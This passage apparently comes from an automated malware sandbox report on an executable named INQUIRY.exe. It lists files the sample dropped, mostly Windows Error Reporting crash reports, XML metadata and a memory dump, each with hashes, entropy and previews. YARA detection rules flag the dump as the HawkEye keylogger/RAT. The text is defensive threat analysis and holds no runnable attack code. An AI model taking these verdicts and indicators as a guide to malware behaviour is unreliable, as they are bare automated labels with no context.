                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19244
                                                                      Entropy (8bit):3.7689860404632216
                                                                      Encrypted:false
                                                                      SSDEEP:192:OYcm0I9+HzHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS27P:X4HziBUZMXIjB7vqsSt/u7sSX4It5a8
                                                                      MD5:C8F2F641B01A44390EE72AB0291023BB
                                                                      SHA1:73DD3194D00A241D6506AC88E94A31C0872AAD9E
                                                                      SHA-256:253F7456400E5CD904BCCB71A341A89DDED83968C28A9ECDED505C38833040EE
                                                                      SHA-512:D10C15F5E4E81ACB4489DFD0CD212672A3396CF5CCCC38D76A5225B0E68B72EC05B22D9F2C08377CE5736CEAE4D545DB1C0DCF44A99D889EA64C797035DA4CE5
                                                                      Malicious:true
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.8.7.2.5.3.6.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.8.3.6.3.1.5.7.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.7.4.7.1.9.9.a.-.f.e.7.9.-.4.4.6.d.-.a.c.8.3.-.2.3.0.d.3.d.4.9.4.3.4.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.2.5.9.2.d.1.2.-.6.6.c.3.-.4.7.1.1.-.b.5.4.7.-.6.5.2.b.0.d.3.e.5.c.b.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q.U.I.R.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.8.-.0.0.0.1.-.0.0.1.b.-.6.1.2.3.-.c.6.7.6.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_INQUIRY.exe_9acf60ae8258c649d949998398a696799dd6ab7_31a5ab7c_1a2a4622\Report.wer
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):19246
                                                                      Entropy (8bit):3.7687586959631867
                                                                      Encrypted:false
                                                                      SSDEEP:192:cg/3+HVHqHBUZMXIjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274ItF:B/uHViBUZMXIjB7vqsSt/u7sSX4It5a0
                                                                      MD5:0F2339E59B1382CFEBA7C65E0204DB37
                                                                      SHA1:869CD3F293F945FE0B794C50EF4899CCC318B52C
                                                                      SHA-256:EBD1A41084A86F927C8E65CD72B32DC6B9A5E16C62205A82F52EC9B364A79947
                                                                      SHA-512:1C8564A5E898644CBCF53664A1D39E26ADF5BE1DBA3DB233E2C325BA846520DACDFAC2DF7243F21C9AF1F78A9F2CCB035C1C2BCFB919FD0B1A8CEF54D657D231
                                                                      Malicious:true
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.3.1.8.8.1.7.4.0.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.4.1.3.3.4.8.3.4.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.c.0.d.d.f.0.9.-.6.b.6.0.-.4.1.9.c.-.a.1.3.4.-.4.f.2.8.d.1.1.b.2.7.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.e.f.0.8.8.e.c.-.c.a.5.c.-.4.4.9.4.-.8.6.f.d.-.f.b.f.f.c.f.f.8.d.b.5.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.N.Q.U.I.R.Y...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_009f3881\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7579185842846132
                                                                      Encrypted:false
                                                                      SSDEEP:192:EZ+HLTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274ItZ:HHLVjB7vqsSt/u7srX4ItZ
                                                                      MD5:FBCEA239031271D5FC498B4CCFF7FFC5
                                                                      SHA1:A317C75282FB18400F1DA04EE684D29A375F5919
                                                                      SHA-256:96D8D97D8A8C4F15EE1E0D1B75A78F8BEEBF3845EDD82E72E8D46F7F92F6B92E
                                                                      SHA-512:6DF096B4314D9F1E9E7672055DA379DE2270F970E3F5F2CE1026322C9CD0F52927DC652D3806CCCCA12662BD9121B0A8BC1528306CB63976184EF87AA99F2261
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.2.7.7.2.1.3.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.0.3.9.2.8.3.7.9.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.1.4.c.0.8.c.-.3.3.4.9.-.4.a.e.4.-.8.5.a.7.-.e.5.4.9.3.b.5.0.4.7.9.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.0.f.0.-.0.0.0.1.-.0.0.1.b.-.1.3.6.7.-.d.8.8.e.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.1.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_18bf7163\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18448
                                                                      Entropy (8bit):3.7581897365137853
                                                                      Encrypted:false
                                                                      SSDEEP:192:21+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7srS274Itu:VH0VjB7vqsSt/u7srX4Itu
                                                                      MD5:5856CBF6D7376E0047754E49722CDE9A
                                                                      SHA1:051FCA316BE423B3D5475C843573239C084BB0AE
                                                                      SHA-256:AC6415AD3FD401C7E0B4547121023266CF2ABBC2F75A35FCCB2763DB2B36AEF3
                                                                      SHA-512:560A4FF5B36ED1ABA6F86856AE12A665208CED8A67893FC36246CC049C7B0DD9872AB2DC26E552D40E24A384B3441555442CE3505138F61EC24DDFE832C1A25F
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.5.4.4.3.9.6.7.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.8.1.8.5.0.6.4.5.5.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.e.3.8.0.2.4.7.-.2.d.d.b.-.4.4.5.7.-.9.b.1.5.-.f.1.3.e.e.5.6.2.1.6.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.5.4.-.0.0.0.1.-.0.0.1.b.-.f.b.5.c.-.2.0.9.8.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.9.6.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1a860a22\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7573567572608084
                                                                      Encrypted:false
                                                                      SSDEEP:192:2Mlg+HPTi+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7stS274Itw:bNHPVjB7vqsSt/u7stX4Itw
                                                                      MD5:BEA478764A49288FAE5D2C58DEA9E7F7
                                                                      SHA1:8601AF0DC1CFDBA1A6FD96882B78E44800F059AF
                                                                      SHA-256:D55EC04B23C4335716973DD1BE81A228576593188597B2FF2422E7CA596DAC57
                                                                      SHA-512:15AA099538B4D44703D965C393892452B5D204568CFE062308F35741F8C10FC87738AFF0CE2AEE3B2D9C3E2770C774C4216A053554CF554073FD0335AC46035B
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.0.5.3.8.0.2.5.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.2.2.1.3.1.7.7.8.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.7.e.5.1.0.d.1.-.c.c.b.4.-.4.5.8.4.-.8.e.d.d.-.e.d.1.2.8.8.9.c.0.1.1.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.0.8.-.0.0.0.1.-.0.0.1.b.-.8.5.b.b.-.c.f.5.b.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.6.2.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_inquiry.exe_e6c573bafb277a8e53b04fdad891cf6b8aba558_00000000_1b4a9849\Report.wer
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):18450
                                                                      Entropy (8bit):3.7581638227883536
                                                                      Encrypted:false
                                                                      SSDEEP:192:B8y+H0Ti+VJjV/C9yq5bMvg/LHZ+nNN2I1rzvq5xk0z5xT5/u7sSS274Itj:kH0VjB7vqsSt/u7sSX4Itj
                                                                      MD5:4E9027E389CF59A8E643336BC538513A
                                                                      SHA1:5FC1F51DA07FA44C69EF4DC8C46AF896176E76F0
                                                                      SHA-256:5E35F7BEAF0E442F1923D24380FE8A32309325B08F6C6815AC221527631AEBEF
                                                                      SHA-512:77A94A00184189C927B7EF97D7308D0E5B629B080DF48CA7DB95BF8C0210E2E37F06377AD55CE8187E4E60F07AB2099AAC49A6B52D76EC1BFF39BC666F852C77
                                                                      Malicious:false
                                                                      Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.0.0.6.9.1.4.6.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.5.0.1.8.1.7.6.3.0.2.2.2.6.3.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.5.9.7.0.9.0.f.-.0.7.a.4.-.4.7.5.1.-.b.9.c.9.-.7.e.3.7.7.2.5.9.1.0.a.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.9.8.-.0.0.0.1.-.0.0.1.b.-.6.1.2.3.-.c.6.7.6.b.3.b.d.d.6.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.1.2.9.9.0.e.1.8.8.e.c.d.5.a.7.e.8.7.1.b.9.7.a.6.a.4.c.b.7.b.b.8.0.0.0.0.f.f.f.f.!.0.0.0.0.5.3.a.e.0.b.5.7.6.f.7.b.3.6.2.b.9.0.a.2.5.a.c.e.1.4.7.0.d.3.3.0.6.8.d.b.4.4.9.0.!.I.N.Q.U.I.R.Y...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.0././.1.1././.1.8.:.0.7.:.4.5.:.1.7.!.0.!.I.N.Q.U.I.R.Y...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.t.A.s.I.d.=.3.7.8.....I.s.F.a.t.a.l.=.4.2.9.4.9.6.7.2.
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 14 streams, Wed Nov 18 14:02:15 2020, 0x60521 type
                                                                      Category:dropped
                                                                      Size (bytes):7008087
                                                                      Entropy (8bit):4.7220376102848896
                                                                      Encrypted:false
                                                                      SSDEEP:98304:dYMlAY0P5P9Hch291r+VT8b1XanA8ngFYT3bRnCSljd5XSoU+zR8MX:djAYaP9HNgGwFJ/5Xv
                                                                      MD5:B959EB0600252402A18BFCF647E10552
                                                                      SHA1:0626EAF638F4FEF2920A77E3BC56740E52E126C5
                                                                      SHA-256:92E8F1B478C7EB956AD40A33A3739229D6C1ACB0793A32A327CF426C6CCE2A77
                                                                      SHA-512:A61C0109EBA44B3ECECA58A5D3DE320553FEE491B820638D50B266122604F6BD3B75660C745BA011C717FEA2E24C15C4AAFC5D49CCF254478E99D55B5A5EF00C
                                                                      Malicious:true
                                                                      Yara Hits:
                                                                      • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                      • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: Joe Security
                                                                      • Rule: Hawkeye, Description: detect HawkEye in memory, Source: C:\ProgramData\Microsoft\Windows\WER\Temp\WER1B59.tmp.mdmp, Author: JPCERT/CC Incident Response Group
                                                                      Preview: MDMP....... .......g)._!..................U...........B.......8......GenuineIntelW...........T...........M)._.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER2E55.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8294
                                                                      Entropy (8bit):3.7043697131252022
                                                                      Encrypted:false
                                                                      SSDEEP:192:Rrl7r3GLNii06Yb6YPI6Egmf0uuS8+prk89bb9sfnpm:RrlsNiJ6s6Yw6EgmfPuSRb2fE
                                                                      MD5:878E1942EA193A0986BDC8426E80F69E
                                                                      SHA1:D47C31FC7B12BA957F6D61AB8E0C5FFDCE2585D6
                                                                      SHA-256:B31B2972C250517AF12D08CD15DE379C47B1FAA215DF97926D7227400370543A
                                                                      SHA-512:BEBD8D8ECEBD5466E4CBC6303EBEC7879A8D6C02057DADCCA7B56E117F426849E56E3E9BBF21F477C3D2EA83ECC2D55D427F756E57942950AA5826416B2B6426
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.8.9.6.<./.P.i.d.>.......
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3043.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):5640
                                                                      Entropy (8bit):3.724414552767444
                                                                      Encrypted:false
                                                                      SSDEEP:96:RtIU6o7r3GLt3i+s6ROcYZtuvUubSfaQgsB+aM1911fH/m:Rrl7r3GLNi+s6ROcYZtuvUubS7+p191g
                                                                      MD5:3ACCC42FCA2CB02425C8B5FEB60C324D
                                                                      SHA1:2EF2A521BF4C9A6F3FA58C56A803D919B985BBE7
                                                                      SHA-256:2ECDDEC9C38A915BD80665FAFBE7779795C1342454EA3C57D8D682FA52A2089E
                                                                      SHA-512:B0813E81B0FA83DEF1700D5B4199F8CA0A8148B07319D158FE513094230C2A355E977F31BE21656C0A92D8B6B46B38C523E21582FEC509DEDA162DACEF37ADD8
                                                                      Malicious:false
                                                                      Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.0.<./.P.i.d.>.........
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER3106.tmp.xml
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4587
                                                                      Entropy (8bit):4.510625392276364
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zs6JgtWI9OK6oWSC8BP8fm8M4JOWjZF5+q89zCpJP6v4HTd:uITfI4aSNKJOgtsCvP6vMTd
                                                                      MD5:A8469566DD777304B6389CE1094F7028
                                                                      SHA1:E5C9D56772A35FD2D8DCA937B993B3F4C092F9B9
                                                                      SHA-256:507E6016E8640ECE9E662D46F13B0C0322C64175A78028E65A471791CF7EB03D
                                                                      SHA-512:8B6460D77CE2B91024D10532ABD27E990F723E906AABC28F2EC02F85301A9A37953DE7BACEBFA1AD1D85FB11F2ECDD7A443C03F3598C42EBD7A9A48A5FF51F43
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734352" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER310F.tmp.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4609
                                                                      Entropy (8bit):4.454622515385555
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwSD8zsUJgtWI9OK6oWSC8Bw08fm8M4JFKg7FT9P+q8v5bpJP6v4H+d:uITfS4aSNYJFKMKVvP6vM+d
                                                                      MD5:E90B24327D824129769567901CF443FD
                                                                      SHA1:136452E7C618931A5D39470F24C97B3CE9FB8858
                                                                      SHA-256:27C78A3143AFDA038D4939AED93E3CB8B249CC9032C6568D01BAC4B57B298BAE
                                                                      SHA-512:BE3CA69E21A0B60EDA1C09659DF6968ADA039FC12791ED077D5E1026E587C40DED3E4FD91A75BAEEE238633622C31D183F440CC241D58E08FF789477FB409854
                                                                      Malicious:false
                                                                      Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="734354" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6231.tmp.WERInternalMetadata.xml
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                      File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                      Category:dropped
